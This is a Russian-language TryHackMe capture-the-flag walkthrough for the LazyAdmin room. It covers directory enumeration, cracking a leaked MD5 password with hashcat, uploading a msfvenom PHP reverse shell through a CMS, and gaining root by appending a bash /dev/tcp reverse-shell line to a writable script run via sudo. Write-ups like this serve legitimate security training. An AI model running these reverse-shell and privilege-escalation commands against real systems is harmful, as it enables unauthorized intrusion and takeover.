TryHackMe: Гид по кибербезопасности | Разборы задач

Решение LazyAdmin на TryHackMe

10 ноября 202510 ноя 2025

2 мин

1. Сканирование nmap 2. Открыт порт 80 смотрю что на нем 3. Стартовая страница апача, значит ищу директории, использую ffuf, так как мне он больше нравится 4. Найдена директория /content, смотрю что на ней 5. На ней распологается страница сайта, ище дальше в этой директории 6. Найдено 6 директорий, из интересного в директории /as находится форма регистрации, но ни логина ни пароля пока что я не знаю 7. В директории /inc находится много файлов и папок, содержимое которых я начал просматривать и в папке /mysql_backup нашел интересный файл mysql_bakup_20191129023059-1.5.1.sql, прочимтав содержимое которго, я увидел что создается таблица и в поля таблицы записываются данные пользователя manager и пароль 42f749ade7f9e195bf475f37a44cafcb 8. Пароль скорее всего заъэширован, поэтому пробую его расшифровать, судя по содержанию это md5, поэтому использую команду hashcat -m 0 -a 0 42f749ade7f9e195bf475f37a44cafcb /usr/share/wordlists/rockyou.txt 9. В результате получилось расшифровать пароль Pas

1. Сканирование nmap

2. Открыт порт 80 смотрю что на нем

3. Стартовая страница апача, значит ищу директории, использую ffuf, так как мне он больше нравится

4. Найдена директория /content, смотрю что на ней

5. На ней распологается страница сайта, ище дальше в этой директории

6. Найдено 6 директорий, из интересного в директории /as находится форма регистрации, но ни логина ни пароля пока что я не знаю

7. В директории /inc находится много файлов и папок, содержимое которых я начал просматривать и в папке /mysql_backup нашел интересный файл mysql_bakup_20191129023059-1.5.1.sql, прочимтав содержимое которго, я увидел что создается таблица и в поля таблицы записываются данные пользователя manager и пароль 42f749ade7f9e195bf475f37a44cafcb

8. Пароль скорее всего заъэширован, поэтому пробую его расшифровать, судя по содержанию это md5, поэтому использую команду hashcat -m 0 -a 0 42f749ade7f9e195bf475f37a44cafcb /usr/share/wordlists/rockyou.txt

9. В результате получилось расшифровать пароль Password123

10. Имея имя пользователя manager и пароль Password123 захожу на страницу регистрации, которую нашел ранее и ввожу полученные креды

11. Получилось зайти и я попадаю на страницу какой то CRM, начинаю искать можно ли в нее загрузить файл с реверс шеллом. Нашел, что возможно добавлять не файл а код во вкладке Ads, в нейже в вернем поле задается имя файла

12. Теперь необходимо понять куда добавляются файлы созданные в этой вкладке, для этого создаю файл с названием test.php и записываю туда произвольый текст , после чего используя ffuf увидел, что данный файл добавлен в директорию /inc/ads

13. Теперь с помощью msfvenom создаю полезную нагрузка на php и вывожу ее на экран, так как файл добавить я не могу, а только текст

14. Текст копирую и вставляю в нужное поле CRM

15. Настраиваю слушатель и запускаю

16. Кликаю на файл реверс шелла загруженный в CRM

17. Страница подвисает, значит реверс шелл сработал, проверяю кто я

18. Однострочником получаю tty

19. Командой sudo -l проверяю что мне доступно и вижу, что с правами судо исполняется файл /home/itguy/backup.pl

20. Смотрю что в этом файле

21. Вижу что он запускает другой скрипт /etc/copy.sh, смотрю какие права у этого скрипта

22. Вижу что данный скрипт доступен для чтения, записи и исполнения, поэтому решаю в данный скрипт добавить реверс шелл, и так как этот скрипт запускается скриптом backup.pl с правами sudo, то при успешной эксплуатации я должен получить root

23. Командой echo "bash -c \"bash -i >& /dev/tcp/10.23.205.140/4444 0>&1"" >> /etc/copy.sh добавляю в скрипт строку с реверс шеллом

24. Запускаю слушатель на порту 4444 и с помощью команды sudo -u root /usr/bin/perl /home/itguy/backup.pl запускаю скрипт и получаю реверс шелл. Проверяю кто я

25. Читаю флаги пользователей, перейди к ним в домашнии директории, задача решена